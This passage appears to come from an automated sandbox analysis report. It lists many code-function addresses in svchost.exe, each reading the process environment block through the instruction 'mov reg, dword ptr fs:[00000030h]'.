            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460124 mov eax, dword ptr fs:[00000030h]2_2_03460124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F61C3 mov eax, dword ptr fs:[00000030h]2_2_034F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F61C3 mov eax, dword ptr fs:[00000030h]2_2_034F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035061E5 mov eax, dword ptr fs:[00000030h]2_2_035061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034601F8 mov eax, dword ptr fs:[00000030h]2_2_034601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03470185 mov eax, dword ptr fs:[00000030h]2_2_03470185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EC188 mov eax, dword ptr fs:[00000030h]2_2_034EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EC188 mov eax, dword ptr fs:[00000030h]2_2_034EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4180 mov eax, dword ptr fs:[00000030h]2_2_034D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4180 mov eax, dword ptr fs:[00000030h]2_2_034D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]2_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]2_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]2_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432050 mov eax, dword ptr fs:[00000030h]2_2_03432050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6050 mov eax, dword ptr fs:[00000030h]2_2_034B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345C073 mov eax, dword ptr fs:[00000030h]2_2_0345C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4000 mov ecx, dword ptr fs:[00000030h]2_2_034B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A020 mov eax, dword ptr fs:[00000030h]2_2_0342A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C020 mov eax, dword ptr fs:[00000030h]2_2_0342C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6030 mov eax, dword ptr fs:[00000030h]2_2_034C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B20DE mov eax, dword ptr fs:[00000030h]2_2_034B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0342A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034380E9 mov eax, dword ptr fs:[00000030h]2_2_034380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B60E0 mov eax, dword ptr fs:[00000030h]2_2_034B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C0F0 mov eax, dword ptr fs:[00000030h]2_2_0342C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034720F0 mov ecx, dword ptr fs:[00000030h]2_2_034720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343208A mov eax, dword ptr fs:[00000030h]2_2_0343208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C80A8 mov eax, dword ptr fs:[00000030h]2_2_034C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F60B8 mov eax, dword ptr fs:[00000030h]2_2_034F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F60B8 mov ecx, dword ptr fs:[00000030h]2_2_034F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346674D mov esi, dword ptr fs:[00000030h]2_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346674D mov eax, dword ptr fs:[00000030h]2_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346674D mov eax, dword ptr fs:[00000030h]2_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430750 mov eax, dword ptr fs:[00000030h]2_2_03430750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE75D mov eax, dword ptr fs:[00000030h]2_2_034BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472750 mov eax, dword ptr fs:[00000030h]2_2_03472750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472750 mov eax, dword ptr fs:[00000030h]2_2_03472750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4755 mov eax, dword ptr fs:[00000030h]2_2_034B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438770 mov eax, dword ptr fs:[00000030h]2_2_03438770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C700 mov eax, dword ptr fs:[00000030h]2_2_0346C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430710 mov eax, dword ptr fs:[00000030h]2_2_03430710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460710 mov eax, dword ptr fs:[00000030h]2_2_03460710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C720 mov eax, dword ptr fs:[00000030h]2_2_0346C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C720 mov eax, dword ptr fs:[00000030h]2_2_0346C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346273C mov eax, dword ptr fs:[00000030h]2_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346273C mov ecx, dword ptr fs:[00000030h]2_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346273C mov eax, dword ptr fs:[00000030h]2_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AC730 mov eax, dword ptr fs:[00000030h]2_2_034AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343C7C0 mov eax, dword ptr fs:[00000030h]2_2_0343C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B07C3 mov eax, dword ptr fs:[00000030h]2_2_034B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]2_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]2_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]2_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE7E1 mov eax, dword ptr fs:[00000030h]2_2_034BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034347FB mov eax, dword ptr fs:[00000030h]2_2_034347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034347FB mov eax, dword ptr fs:[00000030h]2_2_034347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D678E mov eax, dword ptr fs:[00000030h]2_2_034D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034307AF mov eax, dword ptr fs:[00000030h]2_2_034307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E47A0 mov eax, dword ptr fs:[00000030h]2_2_034E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344C640 mov eax, dword ptr fs:[00000030h]2_2_0344C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F866E mov eax, dword ptr fs:[00000030h]2_2_034F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F866E mov eax, dword ptr fs:[00000030h]2_2_034F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A660 mov eax, dword ptr fs:[00000030h]2_2_0346A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A660 mov eax, dword ptr fs:[00000030h]2_2_0346A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03462674 mov eax, dword ptr fs:[00000030h]2_2_03462674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE609 mov eax, dword ptr fs:[00000030h]2_2_034AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472619 mov eax, dword ptr fs:[00000030h]2_2_03472619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E627 mov eax, dword ptr fs:[00000030h]2_2_0344E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03466620 mov eax, dword ptr fs:[00000030h]2_2_03466620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468620 mov eax, dword ptr fs:[00000030h]2_2_03468620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343262C mov eax, dword ptr fs:[00000030h]2_2_0343262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0346A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A6C7 mov eax, dword ptr fs:[00000030h]2_2_0346A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B06F1 mov eax, dword ptr fs:[00000030h]2_2_034B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B06F1 mov eax, dword ptr fs:[00000030h]2_2_034B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434690 mov eax, dword ptr fs:[00000030h]2_2_03434690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434690 mov eax, dword ptr fs:[00000030h]2_2_03434690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C6A6 mov eax, dword ptr fs:[00000030h]2_2_0346C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034666B0 mov eax, dword ptr fs:[00000030h]2_2_034666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438550 mov eax, dword ptr fs:[00000030h]2_2_03438550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438550 mov eax, dword ptr fs:[00000030h]2_2_03438550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]2_2_0346656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]2_2_0346656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]2_2_0346656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6500 mov eax, dword ptr fs:[00000030h]2_2_034C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03440535 mov eax, dword ptr fs:[00000030h] (6 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h] (5 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0346E5CF mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034365D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0346A5D0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h] (8 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034325E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0346C5ED mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03432582 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03432582 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03464588 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0346E59C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034545B1 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h] (8 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034EA456 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0342645D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0345245A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034BC460 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03468402 mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0342C427 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h] (7 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0346A430 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034304E5 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034EA49A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034364AB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034644B0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034BA4B0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034E4B4B mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034C6B40 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034FAB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034D8B42 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034DEB50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0342CB7E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h] (9 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0345EB20 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034F8B28 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034DEBD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0345EBFC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034BCBF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03440BBE mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034E4BB0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h] (7 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03440A5B mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034DEA60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034ACA72 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034BCA11 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0346CA24 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0345EA2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03454A35 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0346CA38 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03430AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03464AD0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0346AAEE mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h] (9 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03504A80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03468A90 mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03438AA0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03486AA4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034B0946 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03456962 mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0347096E mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0347096E mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034D4978 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034BC97C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034AE908 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034BC912 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03428918 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034B892A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034C892B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034C69C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034649D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034FA9D3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034BE9E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034629F9 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h] (13 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034309AD mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034B89B3 mov esi, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034B89B3 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03442840 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03460854 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03434859 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034BE872 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034C6870 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034BC810 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03452835 mov eax, dword ptr fs:[00000030h] (5 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03452835 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0346A830 mov eax, dword ptr fs:[00000030h]
